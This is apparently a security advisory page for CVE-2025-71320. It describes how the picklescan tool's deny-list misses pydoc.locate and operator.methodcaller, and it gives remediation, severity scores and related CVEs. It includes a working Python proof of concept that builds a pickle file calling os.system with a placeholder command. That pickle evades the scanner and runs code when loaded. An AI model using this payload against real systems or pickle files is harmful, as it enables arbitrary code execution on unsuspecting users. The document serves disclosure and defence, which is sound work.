Loading...
Skip to main content

CVE-2025-71320

HIGH

Picklescan has Incomplete List of Disallowed Inputs

Published December 29, 2025Updated July 7, 2026Source: osv

Summary

### Summary Currently picklescanner only blocks some specific functions of the pydoc and operator modules. Attackers can use other functions within these allowed modules to go through undetected and achieve RCE on the final user. Particularly * pydoc.locate: Can dynamically resolve and import arbitrary modules (e.g., resolving the string "os" to the actual os module). * operator.methodcaller: Allows executing a method on an object. When combined with a resolved module object, it can execute functions like system. Since locate and methodcaller are not explicitly listed in the deny-list, picklescan treats them as "Safe" or "Suspicious" (depending on configuration) but does not flag them as "Dangerous", allowing the malicious file to bypass the security check. ### PoC use the provided script to create a malicious pickle file ```python import pickle import pydoc import operator import os class ModuleLocator: def __init__(self, module_name): self.module_name = module_name def __reduce__(self): return (pydoc.locate, (self.module_name,)) class RCEPayload: def __reduce__(self): cmd = "notepad" #put your payload here mc = operator.methodcaller("system", cmd) return (mc, (ModuleLocator("os"),)) def generate_exploit(): payload = RCEPayload() try: with open("bypass.pkl", "wb") as f: f.write(pickle.dumps(payload)) print("File 'bypass.pkl' created.") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": generate_exploit() ``` The generated payload will not be flagged as dangerous by picklescan but is actually malicious. ```python import pickle print("Loading bypass.pkl...") pickle.load(open("bypass.pkl", "rb")) ``` Script to open the pickle file, demonstrating impact <img width="746" height="341" alt="image" src="https://github.com/user-attachments/assets/2be1b8f9-d467-408d-b1cf-d40b49100cf0" /> ### Remediation The deny-list for these modules must be upgraded from specific functions to a wildcard (*), indicating that any use of these modules is dangerous.

Remediation

Upgrade to the fixed version using your package manager.

pip
Update picklescan to 0.0.33 or later
pip install "picklescan>=0.0.33"

After upgrading, run your dependency scanner again to confirm the vulnerability is resolved.

Affected Packages (1)

PackageEcosystemAffectedFixed In
picklescan
pypi
0.0.1, 0.0.10, 0.0.11, 0.0.12 (+28 more)0.0.33

Vulnerability Classification

Common Weakness Enumeration (CWE) identifiers for this vulnerability type.

CVSS Score Breakdown

What the CVSS (Common Vulnerability Scoring System) 9.8 score means for each attack dimension.

Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Confidentiality
Integrity
Availability

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

Frequently Asked Questions

What is CVE-2025-71320?
Picklescan has Incomplete List of Disallowed Inputs This vulnerability has been assigned a severity rating of HIGH (CVSS score: 9.8/10).
How do I check if my project is affected by CVE-2025-71320?
CVE-2025-71320 affects picklescan. Use GeekWala's free vulnerability scanner to check your dependencies against CVE-2025-71320 and 200,000+ other known vulnerabilities.

Severity & Exploitability

CVSS Score
9.8

Exploitation is straightforward and causes maximum impact. Patch immediately.

Also Known As

GHSA-84r2-jw7c-4r5q
PYSEC-2026-1785

Related CVEs

  • CVE-2026-53873
    CRITICAL

    PickleScan's profile.run blocklist mismatch allows exec() bypass

  • CVE-2026-56315
    CRITICAL

    PickleScan has multiple stdlib modules with direct RCE not in blocklist

  • CVE-2025-71367
    HIGH

    Picklescan is vulnerable to RCE via missing detection when calling built-in python _operator.attrgetter

  • CVE-2025-71375
    HIGH

    Picklescan is vulnerable to RCE via missing detection when calling built-in python _operator.methodcaller

  • CVE-2025-71325
    HIGH

    Picklescan has pickle parsing logic flaw that leads to malicious pickle file bypass

  • CVE-2026-53874
    HIGH

    picklescan missing detection by simple obfuscation of a `builtins.eval` call

  • CVE-2025-71321
    HIGH

    Picklescan vulnerable to Arbitrary File Writing

  • CVE-2025-71362
    HIGH

    Picklescan missing detection when calling numpy.f2py.crackfortran.getlincoef

Check if you're affected

Scan your dependencies to see if this vulnerability affects your projects.

Scan Your Dependencies